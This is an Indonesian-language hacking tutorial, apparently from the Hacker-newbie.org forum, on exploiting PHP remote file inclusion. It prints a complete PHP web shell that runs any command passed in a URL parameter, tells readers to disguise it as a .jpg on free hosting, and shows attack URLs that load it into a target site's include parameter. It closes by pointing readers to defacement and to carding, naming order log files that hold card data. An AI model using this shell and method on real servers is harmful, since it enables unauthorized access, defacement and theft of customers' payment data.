Detective-ID - Oke Kali Ini Kita akan meng-Hack sebuah server menggunakan Bug PHP Injection.
Persiapan:
1. - Hosting file(Yg gratisan jg banyak. Contoh : Geocities , Ripway, dll)
2. - Lagu2 Kangen band buat nemenin aksi jahanam kamu
Oke, copy paste script berikut
----------------------------------------------------------------------------------------------------------------------------------
Code:
</center></center><br><font face="verdana" size="7"><center><b>CMD</b> - System
Command<br><br></center></font><font face="Verdana" size="1"></center><br>
<b>#</b> CMD PHP : <br>
<b>#</b> Re-DESIGN by : <b>N4is3N - hacker-newbie.org</b><br>
<br>
<br>
<hr>
<br>
<pre><font face="Verdana" size="1">
<?
// CMD - To Execute Command on File Injection Bug ( gif - jpg - txt )
if (isset($chdir)) @chdir($chdir);
ob_start();
system("$cmd 1> /tmp/cmdtemp 2>&1; cat /tmp/cmdtemp; rm /tmp/cmdtemp");
$output = ob_get_contents();
ob_end_clean();
if (!empty($output)) echo str_replace(">", ">", str_replace("<", "<",
$output));
?>
</font></pre>
<br>
<hr>
<br>
<font face="Verdana" size="1">
<b> N4is3N - hacker-newbie.org </b><br>
<b> Exclusif for HN community | www.Hacker-newbie.org</b>
<br><b>Join us at Hacker-Newbie.org</b>
</font>
----------------------------------------------------------------------------------------------------------------------------------
Kalo udah, save dng nama CMD dan format .jpg . Lalu upload ke hosting kamu. (Yg grtisan jg banyak, udh di bahas di atas) Setelah saya upload, nanti saya akan mendapat URL seperti berikut:
http://www.geocities/n4is3n/cmd.jpg
Setelah itu cari target (Ini membutuhkan kesabaran tingkat tinggi)
Setelah ketemu, contoh:
http://www.target.com/main.php?page=article
Nah, kamu ubah URL-nya jd
.http://www.target.com/main.php?page=http://www.geocities/n4is3n/cmd.jpg&cmd=<perintah UNIX disini>
Lalu eksekusi URL tsb! contoh:
.http://www.target.com/main.php?page=http://www.geocities/n4is3n/cmd.jpg&cmd=ls -l
dan liat hasil-nya... browser akan menampilakan semua direktori yg ada di server sesuai perintah UNIX tadi (ls -l adalah perintah untuk melihat isi direktori beserta
permission-nya).
Untuk defacing atau carding, kamu bisa mengexplore lbh jauh lg...
Oke...oke... saya kasih kata kunci-nya:
untuk deface = "index.html, index.php, index.htm"
untuk carding = "orderlog.txt, order.php"
Semua ada di server, tinggal bagaimana cara kamu menemukan-nya :D
so... Happy Hacking!
Thx For HN
-----Semoga Bermanfaat-----